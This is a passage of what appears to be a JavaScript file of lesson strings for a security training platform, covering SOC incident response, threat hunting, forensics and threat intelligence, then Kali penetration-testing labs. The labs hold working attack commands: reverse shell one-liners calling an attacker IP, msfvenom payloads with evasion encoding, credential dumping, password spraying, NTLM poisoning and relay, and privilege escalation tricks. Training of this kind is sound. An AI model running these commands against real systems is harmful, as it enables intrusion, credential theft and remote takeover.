  (CommandLine="*powershell*" OR CommandLine="*pwsh*")
| stats count by Computer, User, CommandLine, ParentImage
| where count > 0
\`\`\``,

  "soc-ir-process": `## Incident Response Process

Incident response follows a structured lifecycle defined by NIST SP 800-61. Every SOC analyst must understand and be able to execute each phase.

## NIST IR Lifecycle

### 1. Preparation
Build capability before incidents occur:
- Develop and test IR plans and playbooks
- Set up communication channels (war room, Slack, PagerDuty)
- Deploy detection tools (SIEM, EDR, IDS)
- Establish relationships (legal, PR, law enforcement)
- Conduct tabletop exercises quarterly

### 2. Detection & Analysis
Identify and validate security incidents:
\`\`\`
Alert Received
    │
    ├── Validate: Is this a true positive?
    ├── Classify: What type of incident?
    ├── Scope: How many systems affected?
    ├── Impact: What data/services at risk?
    └── Priority: P1/P2/P3/P4?
\`\`\`

**Key Analysis Questions:**
- What is the attack vector?
- When did the compromise begin (patient zero)?
- What is the attacker's current access level?
- Is data being exfiltrated?
- Are there indicators of lateral movement?

### 3. Containment
Stop the bleeding without destroying evidence:

**Short-term Containment:**
- Isolate affected hosts from network
- Block malicious IPs/domains at firewall
- Disable compromised accounts
- Take memory dumps before changes

**Long-term Containment:**
- Apply patches to vulnerable systems
- Reset credentials for affected accounts
- Implement additional monitoring
- Set up honeytokens to detect continued access

### 4. Eradication
Remove the threat completely:
- Remove malware from all affected systems
- Close vulnerability that enabled the attack
- Remove attacker persistence mechanisms
- Verify clean state with full scans

### 5. Recovery
Restore systems to normal operation:
- Restore from clean backups
- Rebuild compromised systems
- Monitor closely for re-infection
- Gradually restore services

### 6. Lessons Learned
Improve for next time (within 2 weeks):
- What happened and when? (timeline)
- What worked well?
- What could be improved?
- What detection gaps existed?
- Update playbooks and detection rules

## Incident Severity Classification
| Severity | Description | Example |
|----------|-------------|---------|
| **Critical** | Business-threatening | Ransomware, active data breach |
| **High** | Significant impact | Compromised admin account |
| **Medium** | Limited impact | Malware on single endpoint |
| **Low** | Minimal impact | Phishing email (no clicks) |`,

  "soc-threat-hunting": `## Proactive Threat Hunting

Threat hunting is the proactive search for threats that have evaded existing security controls. Unlike monitoring (reactive), hunting assumes the adversary is already inside.

## The Hunting Loop
\`\`\`
    ┌──────────────┐
    │  Hypothesis  │ ← "Attackers may be using PowerShell 
    │  Generation  │    for lateral movement"
    └──────┬───────┘
           │
    ┌──────▼───────┐
    │    Data      │ ← Collect relevant logs
    │  Collection  │    (process creation, network)
    └──────┬───────┘
           │
    ┌──────▼───────┐
    │ Investigation│ ← Search, correlate, analyze
    │              │
    └──────┬───────┘
           │
    ┌──────▼───────┐
    │   Findings   │ ← Document results, create
    │  & Response  │    detections for future
    └──────────────┘
\`\`\`

## Hypothesis-Driven Hunting

### Using MITRE ATT&CK
1. Pick a technique (e.g., T1059.001 — PowerShell)
2. Understand what it looks like in logs
3. Search for those patterns in your environment
4. Investigate anomalies

### Example Hunts

**Hunt: Living Off the Land Binaries (LOLBins)**
\`\`\`spl
index=sysmon EventCode=1 
| search (process_name IN ("certutil.exe","mshta.exe","regsvr32.exe","rundll32.exe","bitsadmin.exe"))
| stats count by Computer, User, CommandLine
| sort -count
\`\`\`

**Hunt: DNS Tunneling**
\`\`\`spl
index=dns 
| stats count dc(query) as unique_queries avg(query_length) as avg_len by src_ip
| where unique_queries > 500 AND avg_len > 50
\`\`\`

**Hunt: Unusual Outbound Connections**
\`\`\`spl
index=firewall direction=outbound 
| stats sum(bytes) as total_bytes dc(dest_port) as port_count by src_ip, dest_ip
| where port_count > 10 OR total_bytes > 500000000
\`\`\`

**Hunt: Credential Dumping**
\`\`\`spl
index=sysmon EventCode=10 
  TargetImage="*lsass.exe"
  NOT SourceImage IN ("*\\\\csrss.exe","*\\\\svchost.exe","*\\\\MsMpEng.exe")
| table _time, Computer, SourceImage, GrantedAccess
\`\`\`

## Hunting Data Sources
| Source | Visibility |
|--------|-----------|
| **EDR Telemetry** | Process, file, registry, network per endpoint |
| **SIEM Logs** | Aggregated events across environment |
| **Network Flow** | Connection metadata (src, dst, bytes, duration) |
| **DNS Logs** | Domain resolution queries |
| **Proxy Logs** | Web traffic with URLs and user agents |
| **Authentication Logs** | Login events across systems |

## Documenting Hunts
For each hunt, document:
1. **Hypothesis** — What are you looking for and why?
2. **Data sources** — What logs/telemetry did you query?
3. **Methodology** — Queries, tools, analysis steps
4. **Findings** — What did you discover?
5. **Detection opportunity** — Can this become an automated rule?
6. **Recommendations** — Actions for the team`,

  "soc-forensics-basics": `## Digital Forensics for SOC Analysts

Digital forensics involves collecting, preserving, and analyzing digital evidence to understand what happened during a security incident. SOC analysts need forensic skills for incident investigation.

## Evidence Collection Order (Volatility)
Collect the most volatile evidence first:
\`\`\`
1. CPU registers, cache       ← Most volatile (disappears instantly)
2. Memory (RAM)               ← Lost on power off
3. Network connections        ← Changes rapidly
4. Running processes          ← Changes with system activity
5. Disk contents              ← Relatively stable
6. Backup media               ← Most stable
\`\`\`

## Memory Forensics with Volatility 3
\`\`\`bash
# Capture memory (on live system)
# Windows: winpmem_mini_x64.exe memdump.raw
# Linux: sudo avml memdump.lime

# List processes
vol -f memdump.raw windows.pslist

# Process tree (parent-child relationships)
vol -f memdump.raw windows.pstree

# Find hidden/injected processes
vol -f memdump.raw windows.malfind

# Network connections
vol -f memdump.raw windows.netscan

# Command history
vol -f memdump.raw windows.cmdline

# DLL list for a process
vol -f memdump.raw windows.dlllist --pid 1234

# Extract files from memory
vol -f memdump.raw windows.filescan | grep "password"
vol -f memdump.raw windows.dumpfiles --pid 1234
\`\`\`

## Disk Forensics
\`\`\`bash
# Create forensic image (never work on original!)
dd if=/dev/sda of=disk.img bs=4096 status=progress
# Or use dc3dd for forensic hashing
dc3dd if=/dev/sda of=disk.img hash=sha256

# Mount read-only
mount -o ro,noexec,nosuid disk.img /mnt/evidence/

# Timeline analysis with plaso
log2timeline.py timeline.plaso disk.img
psort.py -o l2tcsv timeline.plaso > timeline.csv
\`\`\`

## Windows Forensic Artifacts
| Artifact | Location | Contains |
|----------|----------|----------|
| **Event Logs** | C:\\Windows\\System32\\winevt\\Logs\\ | Security, System, Application events |
| **Prefetch** | C:\\Windows\\Prefetch\\ | Program execution history |
| **Amcache** | C:\\Windows\\AppCompat\\ | Program execution with hashes |
| **Registry Hives** | C:\\Windows\\System32\\config\\ | System configuration, user activity |
| **NTFS $MFT** | Root of NTFS volume | File metadata, timestamps |
| **Browser History** | AppData\\Local\\{Browser}\\ | Web activity, downloads |
| **Recycle Bin** | C:\\$Recycle.Bin\\ | Deleted files |

## Chain of Custody
1. **Document everything** — Who collected what, when, how
2. **Hash all evidence** — SHA-256 before and after analysis
3. **Work on copies** — Never modify original evidence
4. **Secure storage** — Encrypted, access-controlled evidence locker
5. **Maintain logs** — Every action taken on evidence is recorded`,

  "soc-threat-intel": `## Threat Intelligence & IOCs

Threat intelligence transforms raw data about threats into actionable information that helps SOC teams detect, prevent, and respond to attacks.

## Intelligence Types
| Type | Description | Example | Audience |
|------|-------------|---------|----------|
| **Strategic** | High-level trends | "Ransomware targeting healthcare" | Executives |
| **Tactical** | TTPs and attack methods | "APT28 uses spearphishing with macros" | Security managers |
| **Operational** | Specific campaign details | "Campaign X targets via CVE-2024-1234" | IR teams |
| **Technical** | IOCs and signatures | IP: 185.x.x.x, Hash: abc123... | SOC analysts |

## Indicators of Compromise (IOCs)
\`\`\`
IOC Types:
├── Network
│   ├── IP addresses (C2 servers)
│   ├── Domain names (phishing, malware hosting)
│   ├── URLs (download links, C2 paths)
│   └── JA3/JA3S hashes (TLS fingerprints)
├── Host
│   ├── File hashes (MD5, SHA-1, SHA-256)
│   ├── File names and paths
│   ├── Registry keys
│   ├── Mutex names
│   └── Service names
└── Email
    ├── Sender addresses
    ├── Subject lines
    ├── Attachment hashes
    └── Header artifacts
\`\`\`

## Threat Intel Platforms

### MISP (Malware Information Sharing Platform)
- Open-source threat intelligence platform
- Share IOCs between organizations
- Automated correlation and enrichment
- Integration with SIEMs and firewalls

### VirusTotal
\`\`\`bash
# Check a file hash
curl https://www.virustotal.com/api/v3/files/{hash} -H "x-apikey: YOUR_KEY"

# Check a domain
curl https://www.virustotal.com/api/v3/domains/{domain} -H "x-apikey: YOUR_KEY"

# Check an IP
curl https://www.virustotal.com/api/v3/ip_addresses/{ip} -H "x-apikey: YOUR_KEY"
\`\`\`

### Other Key Sources
- **AbuseIPDB** — IP reputation database
- **Shodan** — Internet-connected device search
- **AlienVault OTX** — Open threat exchange
- **URLhaus** — Malicious URL tracker
- **MalwareBazaar** — Malware sample repository

## Integrating Threat Intel into SOC Workflows

### Automated IOC Matching
\`\`\`spl
# Splunk: Match firewall logs against threat feed
index=firewall 
| lookup threat_intel_ip ip AS dest_ip OUTPUT threat_score, threat_type
| where threat_score > 70
| table _time, src_ip, dest_ip, threat_type, threat_score, action
\`\`\`

### Enrichment Workflow
\`\`\`
Alert Received
    │
    ├── Auto-enrich with VirusTotal
    ├── Check against MISP IOC database
    ├── Lookup IP reputation (AbuseIPDB)
    ├── Check domain age (WHOIS)
    └── Add context to ticket
\`\`\`

## The Diamond Model
Analyze threats using four vertices:
- **Adversary** — Who is attacking?
- **Capability** — What tools/techniques are they using?
- **Infrastructure** — What systems are they operating from?
- **Victim** — Who is being targeted?

Understanding the relationships between these helps predict future attacks and improve defenses.`,

// ═══════════════════════════════════════════════════
// KALI LINUX LABS
// ═══════════════════════════════════════════════════

"kali-nmap-basics": `## Nmap — Port Scanning & Service Detection

### Essential Scan Types

\`\`\`bash
# SYN stealth scan (default, requires root)
sudo nmap -sS 10.10.10.1

# Full TCP connect scan (no root needed)
nmap -sT 10.10.10.1

# UDP scan (slow but important)
sudo nmap -sU --top-ports 20 10.10.10.1

# Combined TCP + UDP
sudo nmap -sS -sU 10.10.10.1
\`\`\`

### Service & OS Detection

\`\`\`bash
# Version detection on all ports
nmap -sV -p- 10.10.10.1

# OS detection + version + scripts + traceroute
sudo nmap -A 10.10.10.1

# Aggressive version detection
nmap -sV --version-intensity 5 10.10.10.1
\`\`\`

### NSE Scripts

\`\`\`bash
# Run default scripts
nmap -sC 10.10.10.1

# Specific script
nmap --script=http-enum 10.10.10.1

# Vulnerability scan
nmap --script=vuln 10.10.10.1

# SMB enumeration
nmap --script=smb-enum-shares,smb-enum-users 10.10.10.1
\`\`\`

### Output Formats

\`\`\`bash
# Save all formats at once
nmap -oA scan_results 10.10.10.1

# Grepable output
nmap -oG results.gnmap 10.10.10.1

# XML output (for tools)
nmap -oX results.xml 10.10.10.1
\`\`\`

### Speed & Evasion

\`\`\`bash
# Fast scan (top 100 ports)
nmap -F 10.10.10.1

# Timing templates (0=paranoid, 5=insane)
nmap -T4 10.10.10.1

# Fragment packets for evasion
nmap -f 10.10.10.1

# Decoy scan
nmap -D RND:10 10.10.10.1
\`\`\`

### Quick Reference Cheat Sheet

| Flag | Purpose |
|------|---------|
| -sS | SYN stealth scan |
| -sT | TCP connect scan |
| -sU | UDP scan |
| -sV | Service version detection |
| -O  | OS detection |
| -A  | Aggressive (OS + version + scripts) |
| -p- | All 65535 ports |
| -sC | Default scripts |
| --script | Specific NSE script |
| -oA | Output all formats |`,

"kali-gobuster-ffuf": `## Gobuster & ffuf — Directory & File Brute-Forcing

### Gobuster — Directory Mode

\`\`\`bash
# Basic directory brute-force
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# With extensions
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,html,bak

# With status codes filter
gobuster dir -u http://target.com -w wordlist.txt -s 200,301,302

# Threads and timeout
gobuster dir -u http://target.com -w wordlist.txt -t 50 --timeout 10s

# With cookies (authenticated)
gobuster dir -u http://target.com -w wordlist.txt -c "session=abc123"
\`\`\`

### Gobuster — DNS & VHOST

\`\`\`bash
# Subdomain enumeration
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Virtual host discovery
gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
\`\`\`

### ffuf — Fast Fuzzer

\`\`\`bash
# Directory fuzzing
ffuf -u http://target.com/FUZZ -w wordlist.txt

# Filter by status code
ffuf -u http://target.com/FUZZ -w wordlist.txt -fc 404

# Filter by response size
ffuf -u http://target.com/FUZZ -w wordlist.txt -fs 0

# POST parameter fuzzing
ffuf -u http://target.com/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fc 401

# Header fuzzing
ffuf -u http://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -fc 302
\`\`\`

### Best Wordlists

| Wordlist | Path |
|----------|------|
| Common dirs | /usr/share/wordlists/dirb/common.txt |
| Medium dirs | /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt |
| Big dirs | /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
| Subdomains | /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt |
| Passwords | /usr/share/wordlists/rockyou.txt |`,

"kali-enum-smb": `## SMB & NetBIOS Enumeration

### enum4linux

\`\`\`bash
# Full enumeration
enum4linux -a 10.10.10.1

# Users only
enum4linux -U 10.10.10.1

# Shares only
enum4linux -S 10.10.10.1

# Password policy
enum4linux -P 10.10.10.1
\`\`\`

### smbclient

\`\`\`bash
# List shares (null session)
smbclient -L //10.10.10.1 -N

# Connect to a share
smbclient //10.10.10.1/share -U username

# Download a file
smb: \\> get secret.txt

# Recursive download
smbclient //10.10.10.1/share -U user -c 'recurse; prompt; mget *'
\`\`\`

### CrackMapExec / NetExec

\`\`\`bash
# Check for shares
crackmapexec smb 10.10.10.1 -u user -p pass --shares

# Spray passwords
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Password1'

# Dump SAM hashes
crackmapexec smb 10.10.10.1 -u admin -p pass --sam

# Execute commands
crackmapexec smb 10.10.10.1 -u admin -p pass -x 'whoami'
\`\`\`

### rpcclient

\`\`\`bash
# Null session
rpcclient -U '' -N 10.10.10.1

# Enumerate users
rpcclient $> enumdomusers

# Enumerate groups
rpcclient $> enumdomgroups

# Get user info
rpcclient $> queryuser 0x1f4
\`\`\``,

"kali-osint-recon": `## OSINT & Passive Reconnaissance

### theHarvester

\`\`\`bash
# Search multiple sources
theHarvester -d target.com -b google,bing,linkedin,dnsdumpster

# Save results
theHarvester -d target.com -b all -f results.html
\`\`\`

### Amass

\`\`\`bash
# Passive enumeration
amass enum -passive -d target.com

# Active enumeration
amass enum -d target.com -active -brute

# With output
amass enum -d target.com -o subdomains.txt
\`\`\`

### Shodan CLI

\`\`\`bash
# Search for a host
shodan host 1.2.3.4

# Search query
shodan search "apache city:London"

# Count results
shodan count "port:22 country:US"
\`\`\`

### ExifTool (Metadata Extraction)

\`\`\`bash
# Extract all metadata
exiftool document.pdf

# Extract from all files in a directory
exiftool -r /path/to/files/

# Find usernames in Office docs
exiftool -Creator -Author *.docx
\`\`\`

### Google Dorking

\`\`\`
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com intitle:"index of"
site:target.com ext:sql | ext:db | ext:log
"target.com" password | passwd | credentials
\`\`\``,

"kali-nikto-web": `## Nikto — Web Server Scanning

### Basic Usage

\`\`\`bash
# Scan a target
nikto -h http://target.com

# Scan with SSL
nikto -h https://target.com -ssl

# Scan specific port
nikto -h target.com -p 8080

# Scan multiple ports
nikto -h target.com -p 80,443,8080
\`\`\`

### Output & Tuning

\`\`\`bash
# Save to file
nikto -h http://target.com -o results.html -Format html

# Specific tests only
nikto -h http://target.com -Tuning 1  # File upload
nikto -h http://target.com -Tuning 9  # SQL injection

# Use a proxy
nikto -h http://target.com -useproxy http://127.0.0.1:8080
\`\`\`

### Tuning Options

| Code | Test Category |
|------|--------------|
| 0 | File Upload |
| 1 | Interesting File |
| 2 | Misconfiguration |
| 3 | Information Disclosure |
| 4 | XSS |
| 5 | Remote File Retrieval |
| 9 | SQL Injection |`,

"kali-metasploit-basics": `## Metasploit Framework — Core Commands

### Starting & Navigation

\`\`\`bash
# Start Metasploit
msfconsole

# Initialize the database
msfdb init && msfconsole

# Search for modules
msf6> search eternalblue
msf6> search type:exploit platform:windows smb

# Use a module
msf6> use exploit/windows/smb/ms17_010_eternalblue

# Show options
msf6> show options

# Set options
msf6> set RHOSTS 10.10.10.1
msf6> set LHOST tun0
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
\`\`\`

### Running Exploits

\`\`\`bash
# Run the exploit
msf6> run
# or
msf6> exploit

# Run in background
msf6> exploit -j

# List sessions
msf6> sessions -l

# Interact with session
msf6> sessions -i 1
\`\`\`

### Meterpreter Commands

\`\`\`bash
# System info
meterpreter> sysinfo
meterpreter> getuid

# File operations
meterpreter> download C:\\\\Users\\\\Admin\\\\Desktop\\\\flag.txt
meterpreter> upload linpeas.sh /tmp/

# Privilege escalation
meterpreter> getsystem

# Dump hashes
meterpreter> hashdump

# Port forwarding
meterpreter> portfwd add -l 3389 -p 3389 -r 10.10.10.2

# Shell access
meterpreter> shell

# Background session
meterpreter> background
\`\`\`

### Post-Exploitation Modules

\`\`\`bash
# Enumerate logged-in users
msf6> use post/windows/gather/enum_logged_on_users
msf6> set SESSION 1
msf6> run

# Dump Chrome passwords
msf6> use post/multi/gather/chrome_cookies

# Suggest local exploits
msf6> use post/multi/recon/local_exploit_suggester
\`\`\``,

"kali-msfvenom-payloads": `## msfvenom — Payload Generation

### Linux Payloads

\`\`\`bash
# Reverse shell (staged)
msfvenom -p linux/x64/shell/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell.elf

# Reverse shell (stageless)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell.elf

# Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o met.elf
\`\`\`

### Windows Payloads

\`\`\`bash
# Reverse shell EXE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o shell.exe

# Meterpreter EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o met.exe

# DLL payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f dll -o evil.dll
\`\`\`

### Web Payloads

\`\`\`bash
# PHP reverse shell
msfvenom -p php/reverse_php LHOST=10.10.14.1 LPORT=4444 -f raw > shell.php

# JSP reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f raw > shell.jsp

# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f war -o shell.war

# ASPX reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f aspx -o shell.aspx
\`\`\`

### Encoding & Evasion

\`\`\`bash
# List encoders
msfvenom -l encoders

# Encode with shikata_ga_nai (3 iterations)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o encoded.exe

# Bad characters avoidance
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -b "\\x00\\x0a\\x0d" -f exe -o clean.exe
\`\`\``,

"kali-shells-upgrade": `## Reverse Shells & TTY Upgrades

### One-Liner Reverse Shells

\`\`\`bash
# Bash
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1

# Bash (URL-encoded for web)
bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'

# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# PHP
php -r '$sock=fsockopen("10.10.14.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

# Netcat (traditional)
nc -e /bin/bash 10.10.14.1 4444

# Netcat (without -e)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.1 4444 > /tmp/f

# PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('10.10.14.1',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
\`\`\`

### Catching Shells

\`\`\`bash
# Netcat listener
nc -lvnp 4444

# rlwrap for arrow key support
rlwrap nc -lvnp 4444

# Socat encrypted listener
socat -d -d OPENSSL-LISTEN:4444,cert=cert.pem,verify=0 EXEC:/bin/bash
\`\`\`

### TTY Upgrade (The Full Method)

\`\`\`bash
# Step 1: Spawn PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Step 2: Background the shell
# Press Ctrl+Z

# Step 3: Fix terminal
stty raw -echo; fg

# Step 4: Set terminal type
export TERM=xterm-256color
export SHELL=bash

# Step 5: Fix rows/cols (check your terminal first with 'stty size')
stty rows 38 columns 116
\`\`\`

### Alternative TTY Methods

\`\`\`bash
# script command
script /dev/null -c bash

# socat
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.1:4444
\`\`\``,

"kali-pivoting-tunneling": `## Pivoting & Port Forwarding

### SSH Tunneling

\`\`\`bash
# Local port forward (access remote service locally)
ssh -L 8080:internal-host:80 user@pivot-host
# Now access internal-host:80 via localhost:8080

# Dynamic SOCKS proxy
ssh -D 9050 user@pivot-host
# Configure proxychains: socks5 127.0.0.1 9050

# Remote port forward (expose your service to target network)
ssh -R 8080:localhost:80 user@pivot-host

# SSH through proxychains
proxychains ssh user@internal-host
\`\`\`

### Chisel

\`\`\`bash
# On your machine (server)
chisel server -p 8080 --reverse

# On target (client) — reverse SOCKS proxy
chisel client YOUR_IP:8080 R:socks

# On target — forward a specific port
chisel client YOUR_IP:8080 R:3306:internal-db:3306

# Use with proxychains
# Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080
proxychains nmap -sT internal-host
\`\`\`

### proxychains

\`\`\`bash
# Config file: /etc/proxychains4.conf
# Add: socks5 127.0.0.1 1080

# Use with any tool
proxychains nmap -sT -Pn 10.10.20.1
proxychains curl http://internal-app
proxychains firefox
\`\`\`

### Ligolo-ng (Modern Alternative)

\`\`\`bash
# On proxy (your machine)
./proxy -selfcert

# On agent (target)
./agent -connect YOUR_IP:11601 -ignore-cert

# In ligolo console
>> session
>> start
# Now access the internal network directly
\`\`\``,

"kali-impacket-tools": `## Impacket — Windows Exploitation Suite

### psexec.py — Remote Command Execution

\`\`\`bash
# With password
impacket-psexec domain/user:password@10.10.10.1

# Pass-the-hash
impacket-psexec -hashes :NTLM_HASH domain/user@10.10.10.1

# Execute a command
impacket-psexec domain/user:pass@10.10.10.1 "whoami"
\`\`\`

### secretsdump.py — Credential Extraction

\`\`\`bash
# Dump SAM, LSA secrets, and cached creds
impacket-secretsdump domain/user:pass@10.10.10.1

# Dump with hashes
impacket-secretsdump -hashes :NTLM_HASH domain/user@10.10.10.1

# Dump NTDS.dit (Domain Controller)
impacket-secretsdump -just-dc domain/admin:pass@DC_IP
\`\`\`

### Other Key Tools

\`\`\`bash
# Get Kerberos TGT
impacket-getTGT domain/user:pass -dc-ip 10.10.10.1

# Kerberoasting
impacket-GetUserSPNs domain/user:pass -dc-ip 10.10.10.1 -request

# AS-REP Roasting
impacket-GetNPUsers domain/ -no-pass -usersfile users.txt -dc-ip 10.10.10.1

# WMI execution
impacket-wmiexec domain/user:pass@10.10.10.1

# SMB server (for file transfer)
impacket-smbserver share /tmp/share -smb2support

# MSSQL client
impacket-mssqlclient domain/user:pass@10.10.10.1 -windows-auth
\`\`\``,

"kali-hydra-bruteforce": `## Hydra — Network Service Brute-Forcing

### Common Protocols

\`\`\`bash
# SSH brute-force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1

# FTP brute-force
hydra -L users.txt -P passwords.txt ftp://10.10.10.1

# RDP brute-force
hydra -l admin -P passwords.txt rdp://10.10.10.1

# SMB brute-force
hydra -L users.txt -P passwords.txt smb://10.10.10.1

# MySQL brute-force
hydra -l root -P passwords.txt mysql://10.10.10.1
\`\`\`

### HTTP Forms

\`\`\`bash
# POST form (login page)
hydra -l admin -P passwords.txt 10.10.10.1 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# GET form
hydra -l admin -P passwords.txt 10.10.10.1 http-get-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

# With cookies
hydra -l admin -P passwords.txt 10.10.10.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie: session=abc"
\`\`\`

### Key Flags

| Flag | Purpose |
|------|---------|
| -l | Single username |
| -L | Username wordlist |
| -p | Single password |
| -P | Password wordlist |
| -t | Threads (default 16) |
| -s | Custom port |
| -f | Stop on first valid pair |
| -V | Verbose (show attempts) |
| -o | Output file |`,

"kali-hashcat-john": `## Hashcat & John the Ripper — Hash Cracking

### Identify the Hash

\`\`\`bash
# Use hashid or hash-identifier
hashid '$2a$10$abc...'
hash-identifier

# Or check: https://hashcat.net/wiki/doku.php?id=example_hashes
\`\`\`

### Hashcat

\`\`\`bash
# MD5
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

# SHA-256
hashcat -m 1400 hash.txt rockyou.txt

# NTLM
hashcat -m 1000 hash.txt rockyou.txt

# bcrypt
hashcat -m 3200 hash.txt rockyou.txt

# Kerberos TGS (Kerberoasting)
hashcat -m 13100 tgs_hash.txt rockyou.txt

# WPA2 PMKID
hashcat -m 22000 handshake.hc22000 rockyou.txt

# With rules
hashcat -m 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Mask attack (brute-force pattern)
hashcat -m 0 hash.txt -a 3 '?u?l?l?l?l?d?d?d'
\`\`\`

### John the Ripper

\`\`\`bash
# Auto-detect hash type
john hash.txt

# With wordlist
john --wordlist=rockyou.txt hash.txt

# Show cracked
john --show hash.txt

# Specific format
john --format=raw-md5 --wordlist=rockyou.txt hash.txt

# Extract hashes from files
zip2john protected.zip > zip_hash.txt
ssh2john id_rsa > ssh_hash.txt
keepass2john database.kdbx > kp_hash.txt
\`\`\`

### Hashcat Mask Charsets

| Charset | Characters |
|---------|-----------|
| ?l | a-z |
| ?u | A-Z |
| ?d | 0-9 |
| ?s | Special chars |
| ?a | All printable |`,

"kali-responder-ntlm": `## Responder — LLMNR/NBT-NS Poisoning

### How It Works

1. Victim tries to access a non-existent hostname (e.g., \\\\typo-server)
2. DNS fails, so Windows falls back to **LLMNR/NBT-NS** broadcast
3. **Responder** answers: "That's me!"
4. Victim sends NTLMv2 authentication to Responder
5. You capture the hash and crack it offline

### Running Responder

\`\`\`bash
# Basic (listen on eth0)
sudo responder -I eth0

# With WPAD proxy
sudo responder -I eth0 -wFb

# Analyze mode only (passive — no poisoning)
sudo responder -I eth0 -A
\`\`\`

### Captured Hashes

\`\`\`bash
# Hashes saved to:
/usr/share/responder/logs/

# Crack with hashcat (NTLMv2 = mode 5600)
hashcat -m 5600 captured_hash.txt rockyou.txt

# Crack with john
john --wordlist=rockyou.txt captured_hash.txt
\`\`\`

### NTLM Relay (Instead of Cracking)

\`\`\`bash
# Disable SMB & HTTP in Responder first
sudo nano /usr/share/responder/Responder.conf
# Set SMB = Off, HTTP = Off

# Run ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support

# With command execution
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"
\`\`\``,

"kali-wordlists-cewl": `## Custom Wordlists with CeWL & Crunch

### CeWL — Website Wordlist Generator

\`\`\`bash
# Basic spider (depth 2)
cewl http://target.com -d 2 -w wordlist.txt

# With minimum word length
cewl http://target.com -m 6 -w wordlist.txt

# Include emails
cewl http://target.com -e --email_file emails.txt

# With authentication
cewl http://target.com --auth_type basic --auth_user admin --auth_pass password
\`\`\`

### Crunch — Pattern-Based Generator

\`\`\`bash
# Min 4, max 6 chars, lowercase
crunch 4 6 -o wordlist.txt

# Custom charset
crunch 8 8 abcdef123 -o wordlist.txt

# Pattern (@ = lowercase, , = uppercase, % = number, ^ = special)
crunch 8 8 -t Pass%%@@ -o wordlist.txt
# Generates: Pass00aa, Pass00ab, ...

# Specific output size
crunch 4 4 0123456789 -o pins.txt
\`\`\`

### Wordlist Manipulation

\`\`\`bash
# Sort and deduplicate
sort wordlist.txt | uniq > clean.txt

# Combine wordlists
cat list1.txt list2.txt | sort -u > combined.txt

# Add rules with John
john --wordlist=base.txt --rules --stdout > mutated.txt

# Filter by length
awk 'length >= 8 && length <= 12' wordlist.txt > filtered.txt
\`\`\``,

"kali-linux-privesc": `## Linux Privilege Escalation — Manual Techniques

### Initial Enumeration

\`\`\`bash
# Who am I?
id
whoami
hostname

# OS & kernel info
uname -a
cat /etc/os-release
cat /proc/version

# Users & groups
cat /etc/passwd | grep -v nologin
cat /etc/group

# Network
ip a
netstat -tulpn
ss -tulpn
\`\`\`

### SUID/SGID Binaries

\`\`\`bash
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Check GTFOBins for exploitation
# https://gtfobins.github.io/

# Example: SUID on find
find . -exec /bin/bash -p \\;

# Example: SUID on python
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
\`\`\`

### Sudo Misconfigurations

\`\`\`bash
# Check sudo permissions
sudo -l

# Common exploits:
# sudo vim → :!bash
# sudo awk → awk 'BEGIN {system("/bin/bash")}'
# sudo find → find . -exec /bin/bash \\;
# sudo env → env /bin/bash
